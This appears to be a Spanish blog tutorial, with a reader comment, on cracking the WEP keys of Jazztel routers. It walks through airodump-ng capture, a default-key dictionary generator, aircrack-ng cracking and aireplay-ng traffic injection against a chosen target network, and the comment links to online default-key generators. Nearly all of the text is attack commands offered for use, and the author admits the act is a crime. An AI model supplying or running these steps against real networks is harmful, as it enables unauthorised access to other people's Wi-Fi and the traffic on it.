En primer lugar hay que instalar las herramientas necesarias. Yo cogí las del repositorio de ubuntu:
shell#sudo apt-get install aircrack-ng gcc
Luego existe una libreria/ejecutable que realizo alguien, que realiza un diccionario con las posibles claves qeu vienen por defecto para estas redes (yo lo he usado pero no es necesario) y se encuentra en este enlace. Para hacer usio de este ejecutable realizamos lo siguiente:
shell#gcc jazzdecripter.c jazzdecripter
Para ver las redes que tienes a tu alcance realizamos lo siguiente:
shell#airodump-ng
En mi caso:
shell#airodump-ng eth1
Aqui cogemos y apuntamos el BBSID ( debe empezar por 00:1A:2B:XX:XX:XX si es de jazztel el router) y el canal en el que opera. Tras esto realizaremos el diccionario, este paso no es estrictamente necesario, pero bueno os lo pongo por si acaso.
shell#./jazzdecripter
En mi caso:
shell#./jazzdecripter 00:1A:2B:XX:XX:XX JAZZTEL_XX diccionario.txt
Tras tener el objetivo comenzaremos lo que es propiamente el ataque. Lo primero que hay que realizar es capturar el trafico en un archivo, lo realizaremos con lo siguiente:
shell#airodump-ng -w archivo.cap -c
Yo para mi caso al no haber mucho trafico de otras redes, por vagueza no puso el filtro de --bssid, y solo filtre por canal, quedo asi:
shell#airodump-ng -w jazztel -c 11 eth1
Una vez empezada la captura, la dejamos capturando, y en otra shell distinta. Realizaremos el ataque al password. Mencionaros que es necesario como mínimo con el ataque mediante diccionario tener 5 iv-s. En caso de uqe no sea un password por defecto es necesarioo para una clave de 128 unos 120000 iv-s. El comando a ejecutar en la nueva shell para el caso con el diccionario es el siguiente:
shell2#aircrack-ng
Caso sin diccionario:
shell2#aircrack-ng
En mi caso el comando quedo asi:
shell2#aircrack-ng jazztel-01.cap -w diccionario.txt
Este comando lo dejais en background y se va usando cada 5000 ivs que recopilamos. Y una vez que encuentre la clave os la dará.
Como podeis imaginar si no hay nadie transmitiendo conseguir los paquees necesarios es un poco dificil, en mi caso habia un cliente y aun asi me costo del orden de 3 horas conseguir los necesarios iv-s para conseguir la clave de 128. Exsite una opcion qeu es la de inyectar tráfico, y es la siguiente:
shell3#aireplay-ng -3 -x 1023 -g 1000000 -b
En mi caso seria necesario habilitar el modo monitor de la tarjeta obteniendo un nuevo interfaz por el que poder inyectar el nuevo trafico. El comando quedaria asi:
shell3#aireplay-ng -3 -x 1023 -g 1000000 -b 00:1A:2B:XX:XX:XX -h 00:11:22:33:44:55 -i rtap0 eth1
Editado: Bueno ya para terminar os pongo como unir las capturas (.cap), ya que puede ser muy tedioso esperar a conseguir los paquetes necesarios. Para ello es necesario tener instalado el paquete wireshark-common:
shell4#sudo apt-get install wireshark wireshark-common
para unir los paquetes usaremos mergecap, de la siguiente forma:
shell4#mergecap -w juntado.cap captura1.cap captura2.cap capturaX.cap
Espero que tengais suerte y no haber escrito nada con fallos. Y bueno comentar finalmente que todo lo que hagais es bajo vuestra responsabilidad cometer el delito.
Hay un generador de claves online para redes WLAN y Jazztel, el artículo:
ResponderEliminarhttp://www.segelsoft.com/2011/02/04/generador-de-claves-online-para-jazztel_xxxx-y-wlan_xxxx/
El generador:
http://kz.ath.cx/wlan/